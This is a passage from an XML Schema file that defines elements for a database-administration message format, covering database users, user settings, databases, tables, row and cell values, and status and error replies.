<xs:element maxOccurs="unbounded" minOccurs="0" ref="DBUser"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="DBUser" type="xs:string"/>
<!-- User Settings -->
<xs:element name="UserSettings">
<xs:complexType>
<xs:sequence>
<xs:element minOccurs="0" maxOccurs="unbounded" ref="UserSetting"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="UserSetting">
<xs:complexType>
<xs:sequence>
<xs:element minOccurs="0" maxOccurs="unbounded" ref="User"/>
</xs:sequence>
<xs:attribute name="type" use="required"/>
</xs:complexType>
</xs:element>
<xs:element name="User">
<xs:complexType>
<xs:sequence>
<xs:element ref="Settings" maxOccurs="unbounded"/>
</xs:sequence>
<xs:attribute name="type" use="required" type="xs:NCName"/>
</xs:complexType>
</xs:element>
<xs:element name="Settings">
<xs:complexType mixed="true">
<xs:attribute name="type" use="required"/>
</xs:complexType>
</xs:element>
<!-- Databases -->
<xs:element name="DBs">
<xs:complexType>
<xs:sequence>
<xs:element maxOccurs="unbounded" minOccurs="0" ref="DBName"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="DBName" type="xs:NCName"/>
<!-- DB Tables -->
<xs:element name="DBTables">
<xs:complexType>
<xs:sequence>
<xs:element maxOccurs="unbounded" minOccurs="0" ref="Database"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="Database">
<xs:complexType>
<xs:sequence>
<xs:element maxOccurs="unbounded" minOccurs="0" ref="DBTable"/>
</xs:sequence>
<xs:attribute name="name" use="required" type="xs:NCName"/>
</xs:complexType>
</xs:element>
<xs:element name="DBTable" type="xs:NCName"/>
<!-- Table Values -->
<xs:element name="DBValues">
<xs:complexType>
<xs:sequence>
<xs:element maxOccurs="unbounded" ref="DBTableValues"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="DBTableValues">
<xs:complexType>
<xs:sequence>
<xs:element ref="Row" minOccurs="0" maxOccurs="unbounded"/>
</xs:sequence>
<xs:attribute name="db" type="xs:string"/>
<xs:attribute name="name" type="xs:string"/>
</xs:complexType>
</xs:element>
<xs:element name="Row">
<xs:complexType>
<xs:sequence>
<xs:element maxOccurs="unbounded" minOccurs="0" ref="Cell"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="Cell">
<xs:complexType mixed="true">
<xs:attribute name="column" use="required" type="xs:NCName"/>
</xs:complexType>
</xs:element>
<!-- Status Elements -->
<xs:element name="Status">
<xs:complexType>
<xs:sequence>
<xs:element ref="Error" minOccurs="0"/>
</xs:sequence>
<xs:attribute name="success" use="required" type="xs:NCName"/>
</xs:complexType>
</xs:element>
<xs:element name="Error">
<xs:complexType mixed="true">
<xs:attribute name="type" use="required" type="xs:NCName"/>
</xs:complexType>
</xs:element>
</xs:schema>